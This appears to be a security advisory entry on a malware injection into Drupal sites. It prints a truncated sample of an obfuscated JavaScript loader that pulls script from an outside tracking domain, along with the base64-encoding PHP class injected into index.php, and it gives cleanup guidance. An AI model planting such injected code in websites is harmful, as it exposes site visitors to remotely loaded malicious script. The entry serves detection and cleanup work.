Description:
Injection of an obfuscated script from hxxps://track.amishbrand[.]com/s_code.js?...
Typical sample:
<script>
;(function(){var x=navigator[m("4t}n)e}gnA(r;eistu}")];var y=document[m(":e}idk,owodc,")];if(s(x,m("0s7w)obd)n)i(W{"))&&!s(x,m("&dui{o;r,den;Aj"))){if(!s(y,m("p=na{m9t(uo_,_d_("))){var b=document.createElement('script');b.type='text/javascript';b.async=true;b.src=m('b2)...skipped...o.parentNode.insertBefore(b,o);}}function m(v){var ...skipped...{var k='';for(var p=t.length-1;p>=0;p--){k+=t[p];}return k;}})();
</script>
Cleanup
This malware can be injected into index.php files of Drupal sites in a from of the following PHP code, which needs to be removed to clean the site.
<?php
class SoFooterClass{
public $data = 'PHNjcmlwdD4KOyhmdW5jdGlvbigpe3ZhciB4PW5hdmlnYXRvclttKCI0d...skipped...ZXR1cm4gazt9fSkoKTsKPC9zY3JpcHQ+';
public function __destruct(){
echo base64_decode($this->data);
}
}
$sofooter = new SoFooterClass();
?>
Affecting:
Drupal.
Mitigation:
How to clean a hacked Drupal site